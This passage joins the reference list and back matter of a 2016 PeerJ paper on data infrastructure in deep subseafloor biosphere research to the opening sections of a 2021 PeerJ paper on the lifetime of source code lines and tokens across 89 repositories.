wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • Christine L. Borgman conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. Ethics The following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): UCLA North General Institutional Review Board IRB#10-000909-CR-00002. Data Availability The following information was supplied regarding data availability: The data in this article is human subjects data, and cannot be released given their sensitive nature and the infeasibility of de-identification. REFERENCES Aronova E, Baker KS, Oreskes N. 2010. Big science and big data in biology: from the international geophysical year through the international biological program to the long term ecological research (LTER) network, 1957–present. Historical Studies in the Natural Science 40(2):183–224 DOI 10.1525/hsns.2010.40.2.183. Baker KS, Jackson SJ, Wanetick JR. 2005. Strategies supporting heterogeneous data and interdisciplinary collaboration: towards an ocean informatics environment. In: Proceedings of the 38th annual Hawaii international conference on system sciences, 2005. HICSS ’05. 219b–219b. Beaulieu A. 2010. Research note: from co-location to co-presence: shifts in the use of ethnography for the study of knowledge. Social Studies of Science 40(3):453–470 DOI 10.1177/0306312709359219. Benson DA, Cavanaugh M, Clark K, Karsch-Mizrachi I, Lipman DJ, Ostell J, Say- ers EW. 2013. GenBank. Nucleic Acids Research 41(Database issue):D36–D42 DOI 10.1093/nar/gks119. Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 26/32 https://peerj.com http://dx.doi.org/10.1525/hsns.2010.40.2.183 http://dx.doi.org/10.1177/0306312709359219 http://dx.doi.org/10.1093/nar/gks119 http://dx.doi.org/10.7717/peerj-cs.97 Benson E. 2012. One infrastructure, many global visions: the commercialization and diversification of Argos, a satellite-based environmental surveillance system. Social Studies of Science 42(6):843–868 DOI 10.1177/0306312712457851. Bietz MJ, Lee CP. 2009. Collaboration in metagenomics: sequence databases and the organization of scientific work. In: Wagner I, Tellioğlu H, Balka E, Simon C, Ciolfi L, eds. ECSCW 2009. London: Springer, 243–262. Borgman CL. 2015. Big data, little data, no data: scholarship in the networked world. Cambridge: The MIT Press. Borgman CL, Darch PT, Sands AE, Pasquetto IV, Golshan MS, Wallis JC, Traweek S. 2015. Knowledge infrastructures in science: data, diversity, and digital libraries. International Journal on Digital Librariex 16(3–4):207–227 DOI 10.1007/s00799-015-0157-z. Borgman CL, Wallis JC, Enyedy N. 2007. Little science confronts the data deluge: habitat ecology, embedded sensor networks, and digital libraries. International Journal on Digital Libraries 7(1–2):17–30 DOI 10.1007/s00799-007-0022-9. Borgman CL, Wallis JC, Mayernik MS, Pepe A. 2007. Drowning in data: digital library architecture to support scientific use of embedded sensor networks. In: Joint conference on digital libraries. Vancouver: Association for Computing Machinery, 269–277. Bowker GC. 2000. Biodiversity datadiversity. Social Studies of Science 30(5):643–683 DOI 10.1177/030631200030005001. Bowker GC. 2005. Memory practices in the sciences. Cambridge: MIT Press. Bowler PJ, Morus IR. 2010. Making modern science: a historical survey. Chicago: University of Chicago Press. C-MORE. 2015a. Center for Microbial Oceanography Research and Education. Available at http://cmore.soest.hawaii.edu (accessed on 16 July 2015). C-MORE. 2015b. C-MORE / Data. Available at http://cmore.soest.hawaii.edu/datasearch/ data.php (accessed on 16 July 2015). Ceccarelli L. 2001. Shaping science with rhetoric: the cases of Dobzhansky, Schrodinger, and Wilson. Chicago: University of Chicago Press. Center for Dark Energy Biosphere Investigations. 2010. C-DEBI strategic implemen- tation plan, 2010–2015. Available at http://198.16.6.27/internal/docs/C-DEBI_SIP_ 2010Sep.pdf. Center for Dark Energy Biosphere Investigations. 2011. Center for dark energy biosphere investigations STC annual report 2011. Available at http://www. darkenergybiosphere.org/wp-content/uploads/docs/2011C-DEBI_AnnualReport_ noApp.pdf. Center for Dark Energy Biosphere Investigations. 2012a. C-DEBI data management philosophy and policy. Available at http://www.darkenergybiosphere.org/internal/ docs/C-DEBIDataManagementPlan_2012draft.pdf. Center for Dark Energy Biosphere Investigations. 2012b. C-DEBI ‘‘Activity’’ theme team 2012 workshop—report. Available at http://www.darkenergybiosphere.org/wp- content/uploads/docs/2012C-DEBIactivity_WorkshopReport.pdf. Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 27/32 https://peerj.com http://dx.doi.org/10.1177/0306312712457851 http://dx.doi.org/10.1007/s00799-015-0157-z http://dx.doi.org/10.1007/s00799-007-0022-9 http://dx.doi.org/10.1177/030631200030005001 http://cmore.soest.hawaii.edu http://cmore.soest.hawaii.edu/datasearch/data.php http://cmore.soest.hawaii.edu/datasearch/data.php http://198.16.6.27/internal/docs/C-DEBI_SIP_2010Sep.pdf http://198.16.6.27/internal/docs/C-DEBI_SIP_2010Sep.pdf http://www.darkenergybiosphere.org/wp-content/uploads/docs/2011C-DEBI_AnnualReport_noApp.pdf http://www.darkenergybiosphere.org/wp-content/uploads/docs/2011C-DEBI_AnnualReport_noApp.pdf http://www.darkenergybiosphere.org/wp-content/uploads/docs/2011C-DEBI_AnnualReport_noApp.pdf http://www.darkenergybiosphere.org/internal/docs/C-DEBIDataManagementPlan_2012draft.pdf http://www.darkenergybiosphere.org/internal/docs/C-DEBIDataManagementPlan_2012draft.pdf http://www.darkenergybiosphere.org/wp-content/uploads/docs/2012C-DEBIactivity_WorkshopReport.pdf http://www.darkenergybiosphere.org/wp-content/uploads/docs/2012C-DEBIactivity_WorkshopReport.pdf http://dx.doi.org/10.7717/peerj-cs.97 Center for Dark Energy Biosphere Investigations. 2013a. C-DEBI strategic implemen- tation plan 2013–2014. Available at http://198.16.6.27/internal/docs/C-DEBI_SIP_ 2013-2014.pdf. Center for Dark Energy Biosphere Investigations. 2013b. C-DEBI ‘‘Activity’’ theme team 2013 workshop—report. Bigelow Laboratory for Ocean Sciences & Ocean Point Inn, East Boothbay. ME: C-DEBI. Available at http://www.darkenergybiosphere.org/ wp-content/uploads/docs/2013_C-DEBI_Activity_Workshop_Report.pdf. Center for Dark Energy Biosphere Investigations. 2014a. CDP. Available at http://cdp. darkenergybiosphere.org. Center for Dark Energy Biosphere Investigations. 2014b. Center for dark energy biosphere investigations STC annual report 2013. Available at http://www. darkenergybiosphere.org/wp-content/uploads/docs/C-DEBI-Annual-Report-2013.pdf. Center for Dark Energy Biosphere Investigations. 2016. C-DEBI-funded Projects. Available at http://www.darkenergybiosphere.org/research-activities/funded-projects/ (accessed on 23 July 2015). Chow-White PA, García-Sancho M. 2012. Bidirectional shaping and spaces of conver- gence interactions between biology and computing from the first DNA sequencers to global genome databases. Science, Technology & Human Values 37(1):124–164 DOI 10.1177/0162243910397969. CMOP. 2015. Center for Coastal Margin Observation & Prediction. Available at http: //www.stccmop.org (accessed on 16 July 2015). Committee on the Review of the Scientific Accomplishments and Assessment of the Potential for Future Transformative Discoveries with US-Supported Scientific Ocean Drilling. 2012. Scientific ocean drilling: accomplishments and challenges. Washington, D.C.: National Academies Press. CReSIS. 2015. Center for Remote Sensing of Ice Sheets. Available at http://www.cresis.ku. edu (accessed on 16 July 2015). Darch PT. 2016. Many methods, many microbes: methodological diversity and standard- ization in the deep subseafloor biosphere. In: IConference 2016 proceedings. Available at https://www.ideals.illinois.edu/handle/2142/89330. Darch PT, Borgman CL. 2014. Ship space to database: motivations to manage research data for the deep subseafloor biosphere. In: Proceedings of the 77th annual meeting of the association for information science and technology. Seattle. Available at http: //www.asis.org/asist2014/proceedings/submissions/papers/156paper.pdf . Darch PT, Borgman CL, Traweek S, Cummings RL, Wallis JC, Sands AE. 2015. What lies beneath? Knowledge infrastructures in the subseafloor biosphere and beyond. In- ternational Journal on Digital Librarie 16(1):61–77 DOI 10.1007/s00799-015-0137-3. Darch PT, Sands AE. 2015. Beyond big or little science: understanding data lifecycles in astronomy and the deep subseafloor biosphere. In: iConference 2015 proceedings. Newport Beach, CA: iSchools, Available at https://www.ideals.illinois.edu/handle/ 2142/73655. Dark Energy Survey. 2016. Dark energy survey. Available at https://www.darkenergysurvey. org/ (accessed on 23 July 2016). Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 28/32 https://peerj.com http://198.16.6.27/internal/docs/C-DEBI_SIP_2013-2014.pdf http://198.16.6.27/internal/docs/C-DEBI_SIP_2013-2014.pdf http://www.darkenergybiosphere.org/wp-content/uploads/docs/2013_C-DEBI_Activity_Workshop_Report.pdf http://www.darkenergybiosphere.org/wp-content/uploads/docs/2013_C-DEBI_Activity_Workshop_Report.pdf http://cdp.darkenergybiosphere.org http://cdp.darkenergybiosphere.org http://www.darkenergybiosphere.org/wp-content/uploads/docs/C-DEBI-Annual-Report-2013.pdf http://www.darkenergybiosphere.org/wp-content/uploads/docs/C-DEBI-Annual-Report-2013.pdf http://www.darkenergybiosphere.org/research-activities/funded-projects/ http://dx.doi.org/10.1177/0162243910397969 http://www.stccmop.org http://www.stccmop.org http://www.cresis.ku.edu http://www.cresis.ku.edu https://www.ideals.illinois.edu/handle/2142/89330 http://www.asis.org/asist2014/proceedings/submissions/papers/156paper.pdf http://www.asis.org/asist2014/proceedings/submissions/papers/156paper.pdf http://dx.doi.org/10.1007/s00799-015-0137-3 https://www.ideals.illinois.edu/handle/2142/73655 https://www.ideals.illinois.edu/handle/2142/73655 https://www.darkenergysurvey.org/ https://www.darkenergysurvey.org/ http://dx.doi.org/10.7717/peerj-cs.97 Earthscope. 2016. Earthscope. Available at http://www.earthscope.org/ (accessed on 23 July 2016). Edwards K. 2009. Center for Dark Energy Biosphere Investigations (C-DEBI ): a center for resolving the extent, function, dynamics and implications of the subseafloor biosphere. Available at http://www.darkenergybiosphere.org/internal/docs/2009C- DEBI _FullProposal.pdf. Edwards PN. 2010. A vast machine: computer models, climate data, and the politics of global warming. Cambridge: MIT Press. Edwards K, Amend J. 2008. Towards coordination and integration of deep marine biosphere research: the Dark Energy Biosphere Institute (DEBI). Available at https: //www.marum.de/Binaries/Binary18149/Edwards_DeepBiosphereDEBI.pdf. Edwards PN, Bowker GC, Jackson SJ, Williams R. 2009. Introduction: an agenda for in- frastructure studies. Journal of the Association for Information Systems 10(5):364–374. Edwards PN, Jackson SJ, Chalmers MK, Bowker GC, Borgman CL, Ribes D, Burton M, Calvert S. 2013. Knowledge infrastructures: intellectual frameworks and research challenges. Ann Arbor: University of Michigan, 40. Edwards PN, Mayernik MS, Batcheller AL, Bowker GC, Borgman CL. 2011. Science friction: data, metadata, and collaboration. Social Studies of Science 41(5):667–690 DOI 10.1177/0306312711413314. European Space Agency. 2016. Gaia. Available at http://sci.esa.int/gaia/ (accessed on 23 July 2016). Hagen J. 2003. The statistical frame of mind in systematic biology from quanti- tative zoology to biometry. Journal of the History of Biology 36(2):353–384 DOI 10.1023/A:1024479322226. Hammersley M, Atkinson P. 2007. Ethnography: principles in practice. 3rd edition (reprinted). London: Routledge. Hey AJG, Trefethen A. 2003. The data deluge: an e-science perspective. In: Berman F, Fox G, Hey AJG, eds. Grid computing: making the global infrastructure a reality. West Sussex: Wiley, 809–824. Integrated Ocean Drilling Program (IODP) Planning Sub Committee (IPSC) Scientific Planning Working Group. 2001. Earth, oceans and life: IODP initial science plan. Washington, D.C.: International Working Group Support Office. IODP. 2014. International Ocean Discovery Program. Available at http://iodp.org (accessed on 13 June 2014). Jackson SJ, Buyuktur A. 2014. Who killed waters? Mess, method, and forensic explana- tion in the making and unmaking of large-scale science networks. Science, Technology & Human Value 39(2):285–308 DOI 10.1177/0162243913516013. Kay LE. 2000. Who wrote the book of life? A history of the genetic code. Stanford: Stanford University Press. Keller EF. 1984. A feeling for the organism, 10th aniversary edition: the life and work of Barbara McClintock. London: Macmillan. Kelty CM. 2012. This is not an article: model organism newsletters and the question of open science. BioSocieties 7(2):14–168 DOI 10.1057/biosoc.2012. Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 29/32 https://peerj.com http://www.earthscope.org/ http://www.darkenergybiosphere.org/internal/docs/2009C-DEBI _FullProposal.pdf http://www.darkenergybiosphere.org/internal/docs/2009C-DEBI _FullProposal.pdf https://www.marum.de/Binaries/Binary18149/Edwards_DeepBiosphereDEBI.pdf https://www.marum.de/Binaries/Binary18149/Edwards_DeepBiosphereDEBI.pdf http://dx.doi.org/10.1177/0306312711413314 http://sci.esa.int/gaia/ http://dx.doi.org/10.1023/A:1024479322226 http://iodp.org http://dx.doi.org/10.1177/0162243913516013 http://dx.doi.org/10.1057/biosoc.2012 http://dx.doi.org/10.7717/peerj-cs.97 Kitchin R. 2014. Big data, new epistemologies and paradigm shifts. Big Data & Society 1(1):2053951714528481 DOI 10.1177/205395171452848. Kitchin R, Lauriault TP. 2014. Small data, data infrastructures and big data. SSRN Electronic Journal DOI 10.2139/ssrn.237614. Kragh H. 1996. Cosmology and controversy: the historical development of two theories of the universe. Princeton: Princeton University Press. Lenoir T. 1999. Shaping biomedicine as an information science. In: Mary EB, Trudi BH, Robert VW, eds. Proceedings of the 1998 conference on the history and heritage of science information systems. Medford: Information Today, Inc, 27–45. Lenoir T, Hays M. 2000. Manhattan project for biomedicine. In: Controlling our destinies: historical, philosophical, ethical, and theological perspectives on the human genome project. South Bend Indiana: University of Notre Dame Press, 19–26. Leonelli S. 2010. Documenting the emergence of bio-ontologies: or, why research- ing bioinformatics requires HPSSB. History and Philosophy of the Life Sciences 32(1):105–125. Leonelli S. 2012. When humans are the exception: cross-species databases at the interface of biological and clinical research. Social Studies of Science 42(2):214–236 DOI 10.1177/030631271143626. Leonelli S. 2014. What difference does quantity make? On the epistemology of Big Data in biology. Big Data & Society 1(1):2053951714534395 DOI 10.1177/2053951714534395. Leonelli S, Ankeny RA. 2012. Re-thinking organisms: the impact of databases on model organism biology. Studies in History and Philosophy of Science Part C: Studies in History and Philosophy of Biological and Biomedical Sciences 43(1):29–36 DOI 10.1016/j.shpsc.2011.10.003. LSST Science Collaboration, Abell PA, Allison J, Anderson SF, Andrew JR, Angel JRP, Armus L, Arnett D, Asztalos SJ, Axelrod TS, Bailey S, Ballantyne DR, Bankert JR, Barkhouse WA, Barr JD, Barrientos LF, Barth AJ, Bartlett JG, Becker AC, Becla J, Beers TC, Bernstein JP, Biswas R, Blanton MR, Bloom JS, Bochanski JJ, Boeshaar P, Borne KD, Bradac M, Brandt WN, Bridge CR, Brown ME, Brunner RJ, Bullock JS, Burgasser AJ, Burge JH, Burke DL, Cargile PA, Chandrasekharan S, Chartas G, Chesley SR, Chu Y-H, Cinabro D, Claire MW, Claver CF, Clowe D, Connolly AJ, Cook KH, Cooke J, Cooray A, Covey KR, Culliton CS, De Jong R, De Vries WH, Debattista VP, Delgado F, Dell’Antonio IP, Dhital S, Di Stefano R, Dickinson M, Dilday B, Djorgovski SG, Dobler G, Donalek C, Dubois-Felsmann G, Durech J, Eliasdottir A, Eracleous M, Eyer L, Falco EE, Fan X, Fassnacht CD, Ferguson HC, Fernandez YR, Fields BD, Finkbeiner D, Figueroa EE, Fox DB, Francke H, Frank JS, Frieman J, Fromenteau S, Furqan M, Galaz G, Gal-Yam A, Garnavich P, Gawiser E, Geary J, Gee P, Gibson RR, Gilmore K, Grace EA, Green RF, Gressler WJ, Grillmair CJ, Habib S, Haggerty JS, Hamuy M, Harris AW, Hawley SL, Heavens AF, Hebb L, Henry TJ, Hileman E, Hilton EJ, Hoadley K, Holberg JB, Holman MJ, Howell SB, Infante L, Ivezic Z, Jacoby SH, Jain B, Jedicke R, Jee MJ, Jernigan JG, Jha SW, Johnston KV, Jones RL, Juric M, Kaasalainen M, Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 30/32 https://peerj.com http://dx.doi.org/10.1177/205395171452848 http://dx.doi.org/10.2139/ssrn.237614 http://dx.doi.org/10.1177/030631271143626 http://dx.doi.org/10.1177/2053951714534395 http://dx.doi.org/10.1016/j.shpsc.2011.10.003 http://dx.doi.org/10.7717/peerj-cs.97 Kafka SS, Kahn SM, Kaib NA, Kalirai J, Kantor J, Kasliwal MM, Keeton CR, Kessler R, Knezevic Z, Kowalski A, Krabbendam VL, Krughoff KS, Kulkarni S, Kuhlman S, Lacy M, Lepine S, Liang M, Lien A, Lira P, Long KS, Lorenz S, Lotz JM, Lupton RH, Lutz J, Macri LM, Mahabal AA, Mandelbaum R, Marshall P, May M, McGehee PM, Meadows BT, Meert A, Milani A, Miller CJ, Miller M, Mills D, Minniti D, Monet D, Mukadam AS, Nakar E, Neill DR, Newman JA, Nikolaev S, Nordby M, O’Connor P, Oguri M, Oliver J, Olivier SS, Olsen JK, Olsen K, Olszewski EW, Oluseyi H, Padilla ND, Parker A, Pepper J, Peterson JR, Petry C, Pinto PA, Pizagno JL, Popescu B, Prsa A, Radcka V, Raddick MJ, Rasmussen A, Rau A, Rho J, Rhoads JE, Richards GT, Ridgway ST, Robertson BE, Roskar R, Saha A, Sarajedini A, Scannapieco E, Schalk T, Schindler R, Schmidt S, Schmidt S, Schneider DP, Zhan H, et al. 2009. LSST Science Book, Version 2.0. ArXiv preprint. arXiv:0912.0201. Meyer ET. 2009. Moving from small science to big science: social and organizational impediments to large scale data sharing (SSRN Scholarly Paper No. ID 2166245). Rochester: Social Science Research Network. Mukerji C. 2014. A fragile power: scientists and the state. Princeton: Princeton University Press. National Science Foundation. 2010. NSF data management plans. Washington, D.C.: National Science Foundation. NOAA. 2016. National Oceanic and Atmospheric Administration. Available at http: //www.noaa.gov (accessed on 23 July 2015). O’Donoghue T, Punch K (eds.) 2004. Qualitative educational research in action: doing and reflecting. Abingdon: RoutledgeFalmer. Orcutt BN, LaRowe DE, Biddle JF, Colwell FS, Glazer BT, Reese BK, Kirkpatrick JB, Lapham LL, Mills HJ, Sylvan JB, Wankel SD, Wheat CG. 2013. Microbial activity in the marine deep biosphere: progress and prospects. Frontiers in Microbiology 4: Article 189 DOI 10.3389/fmicb.2013.00189. Ortega C. 2003. ARGOS capabilities for global ocean monitoring. In: Dahlin H, Flem- ming NC, Nittis K, Petersson SE, eds. Building the European capacity in operational oceanography: Proceedings of the third international conference on EuroGOOS. Amsterdam: Elsevier, 317–324. Paul NW. 2009. Rationalitäten der Wissenproduktion: Über Transformatio- nen von Gegenständen, Technologien und Information in Biomedizin und Lebenswissenschaften. Berichte Zur Wissenschaftsgeschichte 32(3):230–245 DOI 10.1002/bewi.200901351. Porter TM. 1996. Trust in numbers: the pursuit of objectivity in science and public life. Princeton: Princeton University Press. Ribes D. 2014. Ethnography of scaling, or, how to a fit a national research infrastructure in the room. In: Proceedings of the 17th ACM conference on computer supported cooperative work & social computing. New York: ACM, 158–170. Available at http: //dl.acm.org/citation.cfm?id=2531624. Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 31/32 https://peerj.com http://arXiv.org/abs/0912.0201 http://www.noaa.gov http://www.noaa.gov http://dx.doi.org/10.3389/fmicb.2013.00189 http://dx.doi.org/10.1002/bewi.200901351 http://dl.acm.org/citation.cfm?id=2531624 http://dl.acm.org/citation.cfm?id=2531624 http://dx.doi.org/10.7717/peerj-cs.97 Ribes D, Bowker GC. 2008. Organizing for multidisciplinary collaboration: the case of the geosciences network. In: Olson GM, Zimmerman AS, Bos N, eds. Science on the Internet. Cambridge: MIT Press, 311–330. Ribes D, Finholt TA. 2008. Representing community: knowing users in the face of changing constituencies. In: Proceedings of the 2008 ACM conference on computer supported cooperative work. New York: ACM, 107–116. Ribes D, Polk JB. 2015. Organizing for ontological change: the kernel of an AIDS research infrastructure. Social Studies of Science 45(2):214–241 DOI 10.1177/0306312714558136. Sawyer S. 2008. Data wealth, data poverty, science and cyberinfrastructure. Prometheus 26(4):355–371 DOI 10.1080/08109020802459348. Sloan Digital Sky Survey: Home. 2016. Available at http://www.sdss.org/ (accessed on 08 November 2015). Southern California Earthquake Center. 2016. Southern California Earthquake Center |Studying earthquakes and their effects in California and beyond. Available at https://www.scec.org/ (accessed on 23 July 2016). Star SL. 1999. The ethnography of infrastructure. American Behavioral Scientist 43(3):377–391 DOI 10.1177/00027649921955326. Star SL, Ruhleder K. 1996. Steps toward an ecology of infrastructure: design and access for large information spaces. Information Systems Research 7(1):111–134 DOI 10.1287/isre.7.1.111. Strauss MA. 2014. Mapping the Universe: surveys of the sky as discovery engines in astronomy. Daedalus 143(4):93–102 DOI 10.1162/DAED_a_00309. Suárez-Díaz E, Anaya-Munoz VH. 2008. History, objectivity, and the construction of molecular phylogenies. Studies in History and Philosophy of Science Part C: Studies in History and Philosophy of Biological and Biomedical Science 39(4):451–468. Teske A, Biddle JF, Schrenk M. 2011. 2011 workshop: deep biosphere sediment microbiol- ogy. Available at http://www.darkenergybiosphere.org/RCN/meetings/2011meeting/ docs/2011DEBI_Sedi mentMeetingSummary2.pdf . UNOLS. 2015. University-National Oceanographic Laboratory Services. Available at https://www.unols.org/ (accessed on 16 July 2015). Whitman WB, Coleman DC, Wiebe WJ. 1998. Prokaryotes: the unseen majority. Proceedings of the National Academy of Sciences of the United States of America 95(12):65786583. Darch and Borgman (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.97 32/32 https://peerj.com http://dx.doi.org/10.1177/0306312714558136 http://dx.doi.org/10.1080/08109020802459348 http://www.sdss.org/ https://www.scec.org/ http://dx.doi.org/10.1177/00027649921955326 http://dx.doi.org/10.1287/isre.7.1.111 http://dx.doi.org/10.1162/DAED_a_00309 http://www.darkenergybiosphere.org/RCN/meetings/2011meeting/docs/2011DEBI_Sedi mentMeetingSummary2.pdf http://www.darkenergybiosphere.org/RCN/meetings/2011meeting/docs/2011DEBI_Sedi mentMeetingSummary2.pdf https://www.unols.org/ http://dx.doi.org/10.7717/peerj-cs.97 work_mety3a2v7zdilbbgj4lw5lxvte ---- Software evolution: the lifetime of fine-grained elements Software evolution: the lifetime of fine-grained elements Diomidis Spinellis1,2, Panos Louridas1 and Maria Kechagia3 1 Department of Management Science and Technology, Athens University of Economics and Business, Athens, Greece 2 Department of Software Technology, Delft University of Technology, Delft, The Netherlands 3 Department of Computer Science, University College London, London, UK ABSTRACT A model regarding the lifetime of individual source code lines or tokens can estimate maintenance effort, guide preventive maintenance, and, more broadly, identify factors that can improve the efficiency of software development. We present methods and tools that allow tracking of each line’s or token’s birth and death. Through them, we analyze 3.3 billion source code element lifetime events in 89 revision control repositories. Statistical analysis shows that code lines are durable, with a median lifespan of about 2.4 years, and that young lines are more likely to be modified or deleted, following a Weibull distribution with the associated hazard rate decreasing over time. This behavior appears to be independent from specific characteristics of lines or tokens, as we could not determine factors that influence significantly their longevity across projects. The programing language, and developer tenure and experience were not found to be significantly correlated with line or token longevity, while project size and project age showed only a slight correlation. Subjects Programming Languages, Software Engineering Keywords Software evolution, Code decay, Software aging, Hazard rate, Repository mining INTRODUCTION Although there is a significant body of work regarding the macroscopic characteristics (González-Barahona et al., 2009) and even laws (Lehman, 1980) of software evolution (Herraiz et al., 2013), much less is known about how software evolves at the microscopic scale, namely at the level of lines, statements, expressions, and individual tokens. A study of such details, apart from its self-supporting merits as curiosity-driven empirical research, can derive results that can in the future be used for improving software development processes (Humphrey, 1989, p. 3), architecting software systems (Barnes, Pandey & Garlan, 2013; Breivold, Crnkovic & Larsson, 2012), developing machine learning algorithms (Allamanis et al., 2018; Alon et al., 2019), organizing software development teams (Rodríguez et al., 2012), estimating maintenance effort (Albrecht & Gaffney, 1983; Atkins et al., 2002; Zimmermann et al., 2005), designing new features for configuration management systems (White et al., 2015; Jiang, Armaly & McMillan, 2017), locating software faults (Cotroneo, Natella & Pietrantuono, 2013; Giger, Pinzger & Gall, 2011; Kechagia et al., 2019; Salfner, Lenk & Malek, 2010), guiding probabilistic programing (Gordon et al., 2014), and enhancing programing languages (Vallée-Rai et al., 2010). Here we report on methods, tools, and the results we obtained by studying the lifetime of How to cite this article Spinellis D, Louridas P, Kechagia M. 2021. Software evolution: the lifetime of fine-grained elements. PeerJ Comput. Sci. 7:e372 DOI 10.7717/peerj-cs.372 Submitted 12 November 2020 Accepted 4 January 2021 Published 9 February 2021 Corresponding author Diomidis Spinellis, dds@aueb.gr Academic editor Philipp Leitner Additional Information and Declarations can be found on page 26 DOI 10.7717/peerj-cs.372 Copyright 2021 Spinellis et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.372 mailto:dds@�aueb.�gr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.372 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ unmodified code lines and tokens in 89 revision control repositories over 3.3 billion source code element lifetime events. At the point where the rubber hits the road, software consists of code lines. Their number has been extensively studied to gain insights on topics ranging from development effort (Albrecht & Gaffney, 1983; Gousios, Kalliamvakou & Spinellis, 2008; Lind & Vairavan, 1989) and quality (Buse & Weimer, 2008; Kan, 2002; Stamelos et al., 2002; Zhang, 2009) to software growth (Van Genuchten & Hatton, 2013; Godfrey & Tu, 2000; Hatton, Spinellis & Van Genuchten, 2017; Herraiz, González-Barahona & Robles, 2007). This work contributes to the study of software evolution by looking quantitatively, not at changes in the number of code lines, but how and why individual lines or tokens change over the software’s lifetime. First, consider how long a line of code survives in its initial form. As software evolves over time, some lines are added, others are deleted, and existing ones are modified. From the time that a line enters the code base of a project, for how long does it live, that is, for how long does it remain there unchanged? Are lines of code more of a durable asset that will be around for the long time, or are they more like perishable assets, that will only remain for a short time? How is their lifetime related to factors such as a system’s size or the employed programing language? A process model of aging can be further elaborated through quantitative characteristics. These include the mathematical function that determines when existing lines are likely to “die”. We define as the line’s death its deletion or the modification of its non-whitespace elements, and further examine the validity of this construct by also looking at the lifetimes of individual tokens. In functions that are used to characterize decay processes, their characteristic unit is often expressed through the measure of median lifespan: t½. If a line i is added at time ti,1 and is changed or disappears at time ti;2, its lifespan is ti,2 − ti,1. The median lifespan, over all lines of a project, is the median value of all line lifespans, that is, the median of ti,2 − ti,1 for all i. Now take an added line of code. When will this code be changed or be entirely removed and how does its age factor into this question? One can imagine three possibilities. The first, a high infant mortality scenario, in which new lines of code are often changed as developers fix newly-introduced faults and refactor the code. The second, a senescence scenario, has code lines become outdated and less useful as they age and therefore face increasing chances of being replaced. The third, stochastic scenario, has lines getting replaced mostly due to other factors through what appears to be a random process with regard to their age. In practice, it is likely that all three scenarios play a role, but it is still possible that one of them dominates the aging process. Finally, consider some reasons for which a line may change. These include misunderstood requirements, a fault in the code, or changes cascading from other work. While these are typically qualitatively analyzed, one can also examine the factors associated with them, such as the line’s complexity, its developer’s seniority, the project’s size, or the employed programing language. Apart from its theoretical importance, a model of code aging at the level of code lines is useful in several ways. Many potential applications are listed in the opening paragraph; Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 2/33 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ here are two concrete examples. First, the model can inform managers where to direct maintenance effort, for example to reduce the acquired technical debt (Kruchten, Nord & Ozkaya, 2012) or address newly-discovered security vulnerabilities (Ozment & Schechter, 2006; Penta, Cerulo & Aversano, 2009; Shin et al., 2010). Under the infant mortality scenario old lines are likely to remain in a project for ages, so they should periodically receive some love and care to keep them up to date with modern practices. In contrast, under the senescence scenario these will gradually fade away, so effort invested in maintaining them may be wasted. Second, the function expressing code age and its coefficients for a specific project can be used to guide maintenance effort estimation. This is important because humans are often biased when estimating development effort (Løhre & Jørgensen, 2016). Simplistically, effort is often measured in terms of code lines (Albrecht & Gaffney, 1983; Gousios, Kalliamvakou & Spinellis, 2008; Lind & Vairavan, 1989). Therefore, if, given the age of existing lines, we can estimate how many of the project’s lines are likely to change in the next year, this, together with the project’s estimated code growth rate (Hatton, Spinellis & Van Genuchten, 2017), can roughly determine the required development effort. More broadly and importantly, given that code lines require effort to change, identifying and controlling factors that promote longer- living lines—for instance through better abstraction mechanisms—can direct improvements in software development efficiency. The contributions of this article are the development of an efficient method and tools that allow the tracking of the birth and death of individual source code lines and tokens over periods that can span decades and the empirical analysis of 3.3 billion source code element lifetime events to answer the following research questions. RQ1 For how long does a line of code or token live? The answer to this question determines whether code elements are durable or perishable. RQ2 How is a line’s or token’s age related to the probability of its change or deletion? The answer tells us whether younger code elements are more vulnerable to change and deletion (infant mortality), or whether older ones are more frail (senescence), or whether there are no age-related hazards. RQ3 What other product or process factors may influence a line’s or a token’s survival? We investigate this question along the following dimensions. RQ3a The line’s characteristics, which may reveal change-prone programing constructs or drivers of change. RQ3b The different token types, which may affect the lifetime of the tokens. RQ3c The committer’s experience and tenure; one might expect senior developers to write more stable code. RQ3d The project’s size, which might lend it inertia against change. RQ3e The employed programing language, demonstrating whether some programing languages lend themselves for writing more stable (or, alternatively, flexible) code. METHODS We studied code aging at the level of individual source code lines by selecting a number of suitable revision control repositories to study, coming up with a way to handle merges of Spinellis et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.372 3/33 http://dx.doi.org/10.7717/peerj-cs.372 https://peerj.com/computer-science/ development branches, constructing a tool that can track the lifetime of individual lines across successive software releases, creating a process and tools to also study the lifetime of individual tokens, choosing the statistical methods that best suited the domain, and applying them to the collected data. As recommended by Ince, Hatton & Graham-Cumming (2012), the source code and data associated with our results are openly available online.1 Material selection We ran our study on open source software repositories due to their liberal availability and the fact that this simplifies the replication of our findings. We selected the revision control repositories to study based on five objective criteria consistent with our research goals. GitHub hosting We only selected projects whose history is available on GitHub. This decision simplified the methods we used to select the projects and to traverse a project’s revisions. The choice to use only GitHub-hosted repositories is not as restrictive as it sounds, because nowadays even projects that use other version control systems and hosting often make a (typically read-only) Git version of their repository available on GitHub. Longevity We selected projects with at least ten years of commit data in order to obtain enough samples for statistical analysis. Active development The code in the repository had to be actively developed as determined by code commits. Obviously, code in dormant projects does not exhibit aging processes and cannot be usefully modeled. To examine projects that are actively developed we calculated the number of weeks over the project’s lifetime in which at least one commit had occurred. We then selected projects in which commits occurred in at least 85% of the weeks to take 